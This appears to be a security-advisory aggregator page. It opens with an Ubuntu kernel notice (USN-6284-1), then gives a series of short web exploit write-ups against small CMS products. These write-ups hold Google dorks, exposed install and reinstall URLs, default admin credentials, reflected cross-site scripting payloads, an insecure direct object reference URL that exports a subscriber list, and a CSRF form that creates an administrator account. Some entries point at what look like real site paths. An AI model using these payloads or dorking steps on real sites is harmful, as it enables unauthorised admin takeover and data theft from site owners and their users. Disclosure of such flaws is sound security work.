Ubuntu Security Notice 6284-1 - It was discovered that the netlink implementation in the Linux kernel did not properly validate policies when parsing attributes in some situations. An attacker could use this to cause a denial of service. Billy Jheng Bing Jhong discovered that the CIFS network file system implementation in the Linux kernel did not properly validate arguments to ioctl in some situations. A local attacker could possibly use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6284-1August 11, 2023linux, linux-aws, linux-aws-5.4, linux-gcp, linux-gcp-5.4, linux-gkeop,linux-iot, linux-kvm, linux-oracle, linux-oracle-5.4, linux-raspi,linux-raspi-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-iot: Linux kernel for IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systems- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:It was discovered that the netlink implementation in the Linux kernel didnot properly validate policies when parsing attributes in some situations.An attacker could use this to cause a denial of service (infiniterecursion). (CVE-2020-36691)Billy Jheng Bing Jhong discovered that the CIFS network file systemimplementation in the Linux kernel did not properly validate arguments toioctl() in some situations. A local attacker could possibly use this tocause a denial of service (system crash). (CVE-2022-0168)It was discovered that the ext4 file system implementation in the Linuxkernel contained a use-after-free vulnerability. An attacker could use thisto construct a malicious ext4 file system image that, when mounted, couldcause a denial of service (system crash). (CVE-2022-1184)It was discovered that some AMD x86-64 processors with SMT enabled couldspeculatively execute instructions using a return address from a siblingthread. A local attacker could possibly use this to expose sensitiveinformation. (CVE-2022-27672)William Zhao discovered that the Traffic Control (TC) subsystem in theLinux kernel did not properly handle network packet retransmission incertain situations. A local attacker could use this to cause a denial ofservice (kernel deadlock). (CVE-2022-4269)It was discovered that a race condition existed in the qdisc implementationin the Linux kernel, leading to a use-after-free vulnerability. A localattacker could use this to cause a denial of service (system crash) orpossibly execute arbitrary code. (CVE-2023-0590)It was discovered that a race condition existed in the btrfs file systemimplementation in the Linux kernel, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly expose sensitive information. (CVE-2023-1611)It was discovered that the APM X-Gene SoC hardware monitoring driver in theLinux kernel contained a race condition, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or expose sensitive information (kernel memory).(CVE-2023-1855)It was discovered that the ST NCI NFC driver did not properly handle deviceremoval events. A physically proximate attacker could use this to cause adenial of service (system crash). (CVE-2023-1990)It was discovered that the XFS file system implementation in the Linuxkernel did not properly perform metadata validation when mounting certainimages. An attacker could use this to specially craft a file system imagethat, when mounted, could cause a denial of service (system crash).(CVE-2023-2124)It was discovered that the SLIMpro I2C device driver in the Linux kerneldid not properly validate user-supplied data in some situations, leading toan out-of-bounds write vulnerability. A privileged attacker could use thisto cause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2023-2194)It was discovered that a race condition existed in the TLS subsystem in theLinux kernel, leading to a use-after-free or a null pointer dereferencevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-28466)It was discovered that the DA9150 charger driver in the Linux kernel didnot properly handle device removal, leading to a user-after freevulnerability. A physically proximate attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2023-30772)It was discovered that the btrfs file system implementation in the Linuxkernel did not properly handle error conditions in some situations, leadingto a use-after-free vulnerability. A local attacker could possibly use thisto cause a denial of service (system crash). (CVE-2023-3111)It was discovered that the Ricoh R5C592 MemoryStick card reader driver inthe Linux kernel contained a race condition during module unload, leadingto a use-after-free vulnerability. A local attacker could use this to causea denial of service (system crash) or possibly execute arbitrary code.(CVE-2023-3141)It was discovered that the Qualcomm EMAC ethernet driver in the Linuxkernel did not properly handle device removal, leading to a user-after freevulnerability. A physically proximate attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2023-33203)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1019-iot      5.4.0-1019.20   linux-image-5.4.0-1074-gkeop    5.4.0-1074.78   linux-image-5.4.0-1091-raspi    5.4.0-1091.102   linux-image-5.4.0-1096-kvm      5.4.0-1096.102   linux-image-5.4.0-1106-oracle   5.4.0-1106.115   linux-image-5.4.0-1107-aws      5.4.0-1107.115   linux-image-5.4.0-1110-gcp      5.4.0-1110.119   linux-image-5.4.0-156-generic   5.4.0-156.173   linux-image-5.4.0-156-generic-lpae  5.4.0-156.173   linux-image-5.4.0-156-lowlatency  5.4.0-156.173   linux-image-aws-lts-20.04       5.4.0.1107.104   linux-image-gcp-lts-20.04       5.4.0.1110.112   linux-image-generic             5.4.0.156.152   linux-image-generic-lpae        5.4.0.156.152   linux-image-gkeop               5.4.0.1074.72   linux-image-gkeop-5.4           5.4.0.1074.72   linux-image-kvm                 5.4.0.1096.91   linux-image-lowlatency          5.4.0.156.152   linux-image-oem                 5.4.0.156.152   linux-image-oem-osp1            5.4.0.156.152   linux-image-oracle-lts-20.04    5.4.0.1106.99   linux-image-raspi               5.4.0.1091.121   linux-image-raspi2              5.4.0.1091.121   linux-image-virtual             5.4.0.156.152Ubuntu 18.04 LTS (Available with Ubuntu Pro):   linux-image-5.4.0-1091-raspi    5.4.0-1091.102~18.04.1   linux-image-5.4.0-1106-oracle   5.4.0-1106.115~18.04.1   linux-image-5.4.0-1107-aws      5.4.0-1107.115~18.04.1   linux-image-5.4.0-1110-gcp      5.4.0-1110.119~18.04.1   linux-image-aws                 5.4.0.1107.85   linux-image-gcp                 5.4.0.1110.86   linux-image-oracle              5.4.0.1106.115~18.04.78   linux-image-raspi-hwe-18.04     5.4.0.1091.88After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6284-1   CVE-2020-36691, CVE-2022-0168, CVE-2022-1184, CVE-2022-27672,   CVE-2022-4269, CVE-2023-0590, CVE-2023-1611, CVE-2023-1855,   CVE-2023-1990, CVE-2023-2124, CVE-2023-2194, CVE-2023-28466,   CVE-2023-30772, CVE-2023-3111, CVE-2023-3141, CVE-2023-33203Package Information:   https://launchpad.net/ubuntu/+source/linux/5.4.0-156.173   https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1107.115   https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1110.119   https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1074.78   https://launchpad.net/ubuntu/+source/linux-iot/5.4.0-1019.20   https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1096.102   https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1106.115   https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1091.102

Ubuntu Security Notice USN-6284-1

xterm before 380 supports ReGIS reporting for character-set names even if they have unexpected characters (i.e., neither alphanumeric nor underscore), aka a pointer/overflow issue.

CVE-2023-40359: XTERM - Change Log

BookingWizz version 6.0.1 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : BookingWizz v6.0.1 sensitive information disclosure Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/booking-system/87919?s_rank=9                                                          |  | # Dork      : "BookingWizz v6.0"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The error is from the developer, as it does not warn you to delete the installation file after completion, or it is deleted automatically.[+] When you add install file they show you the real user and pass for admin panel.[+] Use Payload : /install.php[+] https://127.0.0.1therazorsedgebarberscom/tiff/install.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

BookingWizz 6.0.1 Information Disclosure

E-commerce Growisei CMS version 2.0 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : E-commerce Growisei CMS v2.0 insecure Settings Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.growiseit.com/                                                                                         |  | # Dork      :  Growise InfoTech. All Rights Reserved.                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = admin[+] Panel : https://127.0.0.1/khakipacketcom/admin/dashboardGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

E-commerce Growisei CMS 2.0 Insecure Settings

DBCInfoTech CMS version 2.0 suffers from an unauthenticated administrator reinstall vulnerability.

    ====================================================================================================================================| # Title     : dbcinfotech CMS v2.0 Reinstall Script Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://www.themeslide.com/whizclassified-classifieds-cms/                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Reinstall the site manager settings including resetting a new password.    because after the first installation, The setup file was not deleted automatically or by the website owner.    the installation file repeats the installation process.[+] use payload : /index.php/en/install/accountsetup[+] http://127.0.0.1/aphroditepaphiascom/index.php/en/install/accountsetupGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

DBCInfoTech CMS 2.0 Administrator Reinstall

Education Time Indonesian School CRM version 1.7 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Education Time Indonesian School CRM v 1.7 Xss Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir                                                                                                   |  | # Dork      : "media.php?module=detailberita&id="                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/ramadan%20mubark/)%3C/ScRiPt%3E&module=detailberita/unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(908942)%3C/ScRiPt%3E&module=detailberita[+] http://wwumpalangkarayaacid//unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/ramadan%20mubark/)%3C/ScRiPt%3E&module=detailberita/unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(908942)%3C/ScRiPt%3E&module=detailberitaGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Education Time Indonesian School CRM 1.7 Cross Site Scripting

Eden CMS version 1.02 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Eden CMS v1.02 Xss Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://edendesign.be/fr/                                                                                          |  | # Dork      : intext:"Website by Eden Design"                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : artist.php?lang_id=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E&post_id=352[+]  http://www/miniartextilit/artist.php?lang_id=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E&post_id=352        Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Eden CMS 1.02 Cross Site Scripting

Ecommerce Responsive version 1.2 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Ecommerce Responsive v1.2 Insecure Direct Object Reference Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 62.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/ecommerce-responsive-ecommerce-business-management-script/21413994                     |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Any visitor can export and download a subscriber list .[+] use payload : /admin/subscriber-csv.php[+] https://www/demoslycom/xicia/cc/ecommerce/admin/subscriber-csv.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Ecommerce Responsive 1.2 Insecure Direct Object Reference

E-Biz CMS version 2.0 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : E-Biz CMS v2.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               |   
| # Vendor    : https://softech.pk/                                                                                                |    
| # Dork      : Copyright © 2019, Designed By SOFTECH                                                                              |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 17.

[+] Set the target site link Save changes and apply . 

[+] infected file : /add_user.php.

[+] http://127.0.0.1/q7.3/softpanel/add_user.php.

[+] save code as poc.html .

    <h1>Add User</h1>  
    </div>  
      
    <div class="site">  
      <div class="container">  
        <div class="grid-16">

                          <div class="widget" >  
            <div class="widget-header"> <span class="icon-wrench"></span>  
              <h3>Add User </h3>  
            </div>  
              
            <div class="widget-content">  
                
                
                
              <form action="http://aosccom/softpanel/add_user.php" method="post" enctype="multipart/form-data" name="" class="form uniformForm validateForm">  
                <table width="650" border="0" align="center" cellpadding="0" cellspacing="0">  
                  <tr>  
                    <td width="527" align="left"><strong>Name : </strong></td>  
                  </tr>  
                  <tr>  
                    <td><input name="name" value="" class="validate[required]" type="text" id="name" size="50"></td>  
                  </tr>  
                  <tr>  
                    <td><strong>Email :</strong> </td>  
                  </tr>  
                  <tr>  
                    <td><span class="field">  
                      <input name="email"  type="text" id="date"  class="validate[required,custom[email]" size="50" />  
                    </span></td>  
                  </tr>  
                  <tr>  
                    <td><strong>Password :</strong></td>  
                  </tr>  
                  <tr>  
                    <td><div class="field">  
                    <input name="password"  type="text" id="date_English" class="validate[required]" size="50" />          
                  </div> </td>  
                  </tr>  
                  <tr>  
                    <td><strong>Access : </strong></td>  
                  </tr>  
                  <tr>  
                    <td><select name="type" id="type" >  
                        <option value="user" selected="selected">User</option>  
                      <option value="admin">Admin</option>  
                    </select>                           </td>  
                  </tr>  
                  <tr id="link">  
                    <td><table width="100%" border="0" cellspacing="0" cellpadding="0">  
                        <tr>  
                          <td height="30"><strong id="">Privileges:</strong></td>  
                        </tr>  
                        <tr>  
                          <td align="center" valign="middle"><table width="400" border="0" align="center" cellpadding="0" cellspacing="0">

                                                        <tr>  
                              <td width="54%" height="25" align="left"><table width="150" border="0" cellspacing="0" cellpadding="0">  
                                <tr>  
                                  <td height="25"><label for="label">Company News</label></td>  
                                  <td width="10"><input type="checkbox" id="new" name="news" value="Y" onClick="news.value=(this.checked)?'Y':'N'"></td>  
                                </tr>                                <tr>  
                                  <td height="25">Home Banners</td>  
                                  <td><input type="checkbox" id="ban" name="banners" value="Y" onClick="banners.value=(this.checked)?'Y':'N'" ></td>  
                                </tr>                                 <tr>  
                                  <td height="25">Gallery</td>  
                                  <td><input type="checkbox" id="gal" name="gallery" value="Y"  onClick="gallery.value=(this.checked)?'Y':'N'"></td>  
                                </tr>                                <tr>  
                                  <td height="25"><label for="sim">Simple Gallery</label></td>  
                                  <td><input type="checkbox" id="gallery" name="simple_gallery" value="Y"  onClick="simple_gallery.value=(this.checked)?'Y':'N'"></td>  
                                </tr>                                                                                                                                                                                                                              <tr>  
                                  <td height="25">Pages</td>  
                                  <td><input name="pages" type="checkbox" id="pages"onClick="pages.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
                                </tr>                                 <tr>  
                                  <td height="25">Newsletter</td>  
                                  <td><input name="newsletter" type="checkbox" id="newsletter"onClick="newsletter.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
                                </tr>                                                                  <tr>  
                                  <td height="25">Categories</td>  
                                  <td><input name="categories" type="checkbox" id="categories" onClick="categories.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
                                </tr>                                                             </table>                                </td>  
                            </tr>

                                                      </table>                            </td>  
                        </tr>  
                      </table></td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>

                                                      <tr>  
                    <td>&nbsp;</td>  
                  </tr>  
                </table>  
                </td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>  
                  <tr>  
                    <td>&nbsp;</td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>  
                  <tr>  
                    <td>                                          </td>  
                  </tr>  
                  <tr>  
                    <td>&nbsp;</td>  
                  </tr>  
                  <tr>  
                    <td><button  name="save"class="btn btn-primary"><span class="icon-move-alt2"></span>Save</button>

  <button type="reset" class="btn btn-primary"><span class="icon-move-horizontal-alt2"></span>Cancel</button></td>  
                  </tr>  
                </table>  
              </form>  
            </div>

Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================

E-Biz CMS 2.0 Cross Site Request Forgery

EasyPX CMS version 06.02.04 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : EasyPX CMS V06.02.04 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.domphp.com/                                                                                             || # Dork      : Site fonctionnant sous Easy PX 41 CMOS 06.02.04 © 2004 - 2006 Freeware                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This vulnerability affects : /tst/index.php    URL encoded POST input choixgalerie was set to 1" onmouseover=prompt(951655) bad="    The input is reflected inside a tag parameter between double quotes.    URL encoded POST input pg was set to system/fnc/readpg.php'"()&%<ScRiPt >prompt(940614)</ScRiPt>    URL encoded POST input pg was set to modules/login/inscription.php'"()&%<ScRiPt >prompt(904457)</ScRiPt>    URL encoded POST input pg_id was set to http://www.generation-libre.com/index2.php%3foption%3dcom_rss'"()&%<ScRiPt >prompt(920742)</ScRiPt>    URL encoded POST input pg_title was set to RSS'"()&%<ScRiPt >prompt(963497)</ScRiPt>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#google